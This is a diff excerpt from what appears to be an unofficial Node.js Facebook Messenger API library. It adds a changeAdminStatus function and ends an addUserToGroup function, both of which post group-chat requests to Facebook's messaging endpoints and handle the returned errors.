form["log_message_data[added_participants][" + i + "]"] = "fbid:" + userID[i];
|
60
|
+
}
|
61
|
+
|
62
|
+
defaultFuncs
|
63
|
+
.post("https://www.facebook.com/messaging/send/", ctx.jar, form)
|
64
|
+
.then(utils.parseAndCheckLogin(ctx, defaultFuncs))
|
65
|
+
.then(function (resData) {
|
66
|
+
if (!resData) throw { error: "Add to group failed." };
|
67
|
+
if (resData.error) throw resData;
|
68
|
+
|
69
|
+
|
70
|
+
return callback();
|
71
|
+
})
|
72
|
+
.catch(function (err) {
|
73
|
+
log.error("addUserToGroup", err);
|
74
|
+
return callback(err);
|
75
|
+
});
|
76
|
+
|
77
|
+
return returnPromise;
|
78
|
+
};
|
79
|
+
};
|
@@ -0,0 +1,79 @@
|
|
1
|
+
"use strict";
|
2
|
+
|
3
|
+
const utils = require("../utils");
|
4
|
+
const log = require("npmlog");
|
5
|
+
|
6
|
+
module.exports = function(defaultFuncs, api, ctx) {
|
7
|
+
return function changeAdminStatus(threadID, adminIDs, adminStatus, callback) {
|
8
|
+
if (utils.getType(threadID) !== "String") {
|
9
|
+
throw {error: "changeAdminStatus: threadID must be a string"};
|
10
|
+
}
|
11
|
+
|
12
|
+
if (utils.getType(adminIDs) === "String") {
|
13
|
+
adminIDs = [adminIDs];
|
14
|
+
}
|
15
|
+
|
16
|
+
if (utils.getType(adminIDs) !== "Array") {
|
17
|
+
throw {error: "changeAdminStatus: adminIDs must be an array or string"};
|
18
|
+
}
|
19
|
+
|
20
|
+
if (utils.getType(adminStatus) !== "Boolean") {
|
21
|
+
throw {error: "changeAdminStatus: adminStatus must be a string"};
|
22
|
+
}
|
23
|
+
|
24
|
+
var resolveFunc = function(){};
|
25
|
+
var rejectFunc = function(){};
|
26
|
+
var returnPromise = new Promise(function (resolve, reject) {
|
27
|
+
resolveFunc = resolve;
|
28
|
+
rejectFunc = reject;
|
29
|
+
});
|
30
|
+
|
31
|
+
if (!callback) {
|
32
|
+
callback = function (err) {
|
33
|
+
if (err) {
|
34
|
+
return rejectFunc(err);
|
35
|
+
}
|
36
|
+
resolveFunc();
|
37
|
+
};
|
38
|
+
}
|
39
|
+
|
40
|
+
if (utils.getType(callback) !== "Function" && utils.getType(callback) !== "AsyncFunction") {
|
41
|
+
throw {error: "changeAdminStatus: callback is not a function"};
|
42
|
+
}
|
43
|
+
|
44
|
+
let form = {
|
45
|
+
"thread_fbid": threadID,
|
46
|
+
};
|
47
|
+
|
48
|
+
let i = 0;
|
49
|
+
for (let u of adminIDs) {
|
50
|
+
form[`admin_ids[${i++}]`] = u;
|
51
|
+
}
|
52
|
+
form["add"] = adminStatus;
|
53
|
+
|
54
|
+
defaultFuncs
|
55
|
+
.post("https://www.facebook.com/messaging/save_admins/?dpr=1", ctx.jar, form)
|
56
|
+
.then(utils.parseAndCheckLogin(ctx, defaultFuncs))
|
57
|
+
.then(function(resData) {
|
58
|
+
if (resData.error) {
|
59
|
+
switch (resData.error) {
|
60
|
+
case 1976004:
|
61
|
+
throw { error: "Cannot alter admin status: you are not an admin.", rawResponse: resData };
|
62
|
+
case 1357031:
|
63
|
+
throw { error: "Cannot alter admin status: this thread is not a group chat.", rawResponse: resData };
|
64
|
+
default:
|
65
|
+
throw { error: "Cannot alter admin status: unknown error.", rawResponse: resData };
|
66
|
+
}
|
67
|
+
}
|
68
|
+
|
69
|
+
callback();
|
70
|
+
})
|
71
|
+
.catch(function(err) {
|
72
|
+
log.error("changeAdminStatus", err);
|
73
|
+
return callback(err);
|
74
|
+
});
|
75
|
+
|
76
|
+
return returnPromise;
|
77
|
+
};
|
78
|
+
};
|
79
|
+
|